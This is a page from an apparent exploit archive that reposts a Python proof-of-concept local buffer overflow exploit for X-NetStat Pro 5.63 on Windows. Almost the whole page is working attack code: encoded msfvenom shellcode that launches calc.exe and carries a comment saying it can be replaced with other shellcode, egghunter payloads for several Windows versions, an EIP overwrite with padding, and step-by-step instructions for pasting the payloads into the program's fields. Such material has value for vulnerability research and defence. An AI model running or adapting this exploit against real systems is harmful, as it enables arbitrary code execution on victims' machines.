Xnetstat pro 5.63 local buffer overflow Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2019-03-25 | Type : local | Platform : windows
This exploit / vulnerability Xnetstat pro 5.63 local buffer overflow is for educational purposes only and if it is used you will do on your own risk!

---

[+] Code ...

#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter) #
# Date: 2019-03-23 #
# Author: Peyman Forouzan #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit #
# Vendor Homepage: https://freshsoftware.com #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe #
# Version: 5.63 #
# Special Thanks to my wife #
# The program has Local Buffer Overflow in several places. #
# Note: Although there are even more simple codes to this vulnerability, #
# this technique (EggHunter) has been used to run vulnerability in different windows versions. #
# Steps : #
# 1- Run python code : X-NetStat.py ( Three files are created ) #
# 2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL" #
# --> Enter --> Close HTTP Client window. #
# 3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok #
# --> Wait a litle --> Shellcode (Calc) open #
# Also Instead of the third stage you can : #
# File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt #
# or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" --> #
# Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------ EGG Shellcode Generation ---------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg = "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#--------------------------------- EGG Hunter Shellcode Generation -----------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter = "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 = "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

eip = "\x77\x5a\x46"

buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip # Direct Eip Overflow

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()